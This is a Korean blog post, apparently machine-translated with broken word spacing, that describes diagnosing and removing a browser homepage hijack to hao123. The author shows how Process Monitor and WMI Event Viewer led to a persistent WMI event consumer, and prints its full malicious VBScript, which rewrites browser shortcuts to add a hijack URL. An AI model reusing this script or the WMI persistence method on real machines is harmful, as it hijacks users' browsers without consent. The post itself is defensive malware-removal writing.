hao 123 chrome 홈 페이지 납치 문제 해결

링크 :  http://xinghao.me/2016/03/01/2016-03-01-kill-hao123/
머리말
최근 시스템 을 활성화 시 켜 주 고 다음 망아지 활성화 프로그램 을 컴퓨터 에 켜 서 정상적으로 작 동 하 는 지 확인 하고 보 냈 습 니 다.
별일 없 을 줄 알 았 는데 시간 이 지나 면 여느 때 처럼 chrome 을 열 고 익숙 한 구 글 홈 페이지 가 아 닌 hao 123 이 나 오 는 기분 은 글 1 에서 표현 한 것 처럼 "파 리 를 먹 은 것 처럼 징그럽다"는 것 이다.오랫동안 고생 하 다가 마침내 이 문 제 를 해결 하 였 다.
원인 분석
먼저 chrome 홈 페이지 설정 을 확인 해 보 니 문제 가 없 었 고 여전히 구 글 닷 컴 이 었 습 니 다.
그리고 chrome 의 설치 디 렉 터 리 에 가서 chrome 프로그램 을 두 번 눌 러 서 열 면 문제 가 없습니다.
그리고 단축 키 를 확인 하 세 요.나 는 chrome 을 작업 표시 줄 에 고정 시 켰 기 때문에, 일반적으로 사용 할 때 작업 표시 줄 아이콘 을 클릭 하 는데, 사실은 이것 은 단지 단축 키 일 뿐이다.작업 표시 줄 chrome 아이콘 을 오른쪽 단추 로 누 르 면 Google Chrome -> 속성 이 나타 납 니 다.단축 키 의 대상 링크 가 수정 되 었 음 을 발 견 했 습 니 다. 시작 파 라미 터 를 하나 더 추 가 했 습 니 다.

1

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" http://hao.169x.cn/?v=108

이 사 이 트 는 열 면 hao 123. com 으로 바 뀝 니 다.
이 유 를 찾 아 냈 습 니 다. 홈 페이지 가 협박 당 하 는 이 유 는 시스템 에 있 는 모든 chrome 과 관련 된 단축 키 가 수정 되 었 고 시작 파 라 메 터 를 추가 하여 시작 할 때마다 이 사이트 로 이동 하기 때 문 입 니 다.작업 표시 줄 단축 키 를 제외 하고 시작 메뉴 에서 chrome 과 관련 된 모든 단축 키 는 피 할 수 없습니다.
복구 시도
이 원인 을 찾 은 후에 인터넷 의 일부 방법 과 결합 하여 많은 시 도 를 했 지만 결국은 철저하게 해결 하지 못 했다.
모든 단축 키 의 시작 인 자 를 수 동 으로 삭제 합 니 다.이 방법 은 근본 적 인 문 제 를 해결 하지 않 고 해결 할 수 있 을 것 이 라 고 생각 했 는데 시간 이 지나 거나 시스템 을 다시 시작 하면 모든 단축 키 가 악의 적 으로 수정 된다.
글 2 를 참고 하 는 방법 을 시 도 했 지만 글 에서 말 한 레 지 스 트 항목 과 숨겨 진 파일 을 찾 을 수 없습니다.
레 지 스 트 에서 hao 123 과 관련 된 모든 내용 을 검색 한 후 삭제 하지만 문 제 는 여전히 존재 합 니 다.
hao 123 과 관련 된 모든 파일 과 폴 더 를 Everything 으로 검색 하 였 으 나 삭제 후에 도 문제 가 해결 되 지 않 았 습 니 다.
마지막 으로 참고 글 1 의 방법 을 찾 았 지만 WMI 이벤트 뷰 어 에서 글 에서 말 한 을 찾 을 수 없습니다.EventFilter:Name=”unown_filter”
크롬 을 다시 장 착 했 지만 한동안 징 그 러 웠 던 hao 123 이 돌 아 왔 다 모든 chrome 단축 키 를 읽 기 전용 으로 설정 하 였 으 나, 한동안 발견 한 후에 도 악의 적 으로 수정 되 었 습 니 다 해결 방법
이런 두통 의 시 도 를 거 친 후에 먼저 한 걸음 한 걸음 원인 을 파악 하기 로 결정 했다. 먼저 어떤 프로그램 이 chrome 단축 키 를 수 정 했 는 지 살 펴 봐 야 한다.Process Monitor, 메뉴 표시 줄 Filter -> filter 를 다운로드 하고 팝 업 창 에서 chrome 의 단축 키 경 로 를 감시 에 추가 합 니 다. 이 럴 때 chrome 에 대해 어떠한 조작 도 하지 마 십시오. 열 림, 오른쪽 키 등 을 포함 하여 방 해 를 받 지 않도록 주의 하 십시오.한 동안 감시 한 후에 원흉 이 정 체 를 드 러 냈 다. 바로 이 scrcons. exe 라 는 프로그램 이 chrome 단축 키 를 수정 하고 있다 는 것 이다.
이때 포 지 셔 닝 된 원인 이 이 글 의 원인 과 같다 는 것 을 발견 하고 다시 글 에서 말 한 방법 에 따라 WMI Event Viewer 로 WMI 사건 을 살 펴 보 았 다.그러나 루트/subscription 에서 수상 한 항목 을 찾 지 못 했 습 니 다. 마지막 으로 몇 번 찾 아 보 니 루트\CIMV 2 에서 진 범 을 밝 혀 냈 습 니 다.먼저 WMI Event Viewer 를 열 고 왼쪽 상단 도구 모음 에 있 는 Register for Events 단 추 를 누 르 면 기본적으로 root\\CIMV 2 에 연결 되 며, 직접 확인 을 누 르 면 됩 니 다.그리고 Consumer in root\CIMV 2 ->EventConsumer -> ActiveScriptEventConsumer 에서 수상 한 항목 을 찾 았 습 니 다.ActiveScriptEventConsumer. Name = "VBScriptKids 더 블 클릭consumer ", 속성 페이지 팝 업: chrome 단축 키 가 수 정 된 원흉 인 ScriptText 를 발견 할 수 있 습 니 다.

1

On Error Resume Next:Const link = "http://hao.169x.cn/?v=108":Const link360 = "http://hao.169x.cn/?v=108&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\chenxh\Desktop,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\chenxh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

이 스 크 립 트 는 정기 적 으로 시스템 에 호출 되 기 때문에 단축 키 의 인 자 를 수 동 으로 비 워 도 일정 시간 후에 다시 바 뀝 니 다.
이것 도 많은 건달 소프트웨어 가 자주 사용 하 는 방법 으로 구체 적 으로 WMI 를 이용 하여 완벽 한 '삼 무' 뒷문 을 만 드 는 것 을 참고 할 수 있다.
악성 스 크 립 트 분석
위의 VB 스 크 립 트 는 콜론 을 구분자 로 하여 프로그램 을 하나의 문구 로 썼 습 니 다. 이해 하기 편리 하도록 이 스 크 립 트 를 다시 조판 하 였 습 니 다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

On Error Resume Next
Const link = "http://hao.169x.cn/?v=108"
Const link360 = "http://hao.169x.cn/?v=108&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\chenxh\Desktop,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\chenxh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
  oDic.Add LCase(browser), browser
Next
  lnkpathsArr = split(lnkpaths,",")

  Set oFolders = CreateObject("scripting.dictionary")
  For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
  Next
    Set fso = CreateObject("Scripting.Filesystemobject")
    Set WshShell = CreateObject("Wscript.Shell")
    For Each oFolder In oFolders
      If fso.FolderExists(oFolder) Then
        For Each file In fso.GetFolder(oFolder).Files
          If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
              If LCase(name) = LCase("360se.exe") Then
                oShellLink.Arguments = link360
              Else
                oShellLink.Arguments = link
              End If
              If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
              End If
              oShellLink.Save
            End If
          End If
       Next
      End If
    Next

이 스 크 립 트 는 모든 단축 키 디 렉 터 리 (linkpaths) 에 있 는 모든 브 라 우 저 (browsers) 를 옮 겨 다 니 는 단축 키 입 니 다. 그리고 단축 키 에 시작 파 라 메 터 를 다시 추가 합 니 다.
이에 이 르 러 입 속으로 날 아 간 이 더러 운 파 리 는 마침내 토 해 냈 다.이것 도 우 리 를 교육 합 니 다. 정품 시스템 과 소프트웨어 를 지원 해 야 합 니 다!!(진지 한 얼굴)
입 을 조심해 라, 당연히 파리 가 날 아 들 어가 지 않 을 것 이다.
레 퍼 런 스
[1] 어떻게 수공 으로 제거 합 니까?http://www.2345.com/?kunown악성 링크!
[2] hao 123, hao. qquu 8. com 이 IE, Chrome 브 라 우 저 를 납치 하 는 해결 방법
[3] WMI 로 완벽 한 '삼 무' 뒷문 만 들 기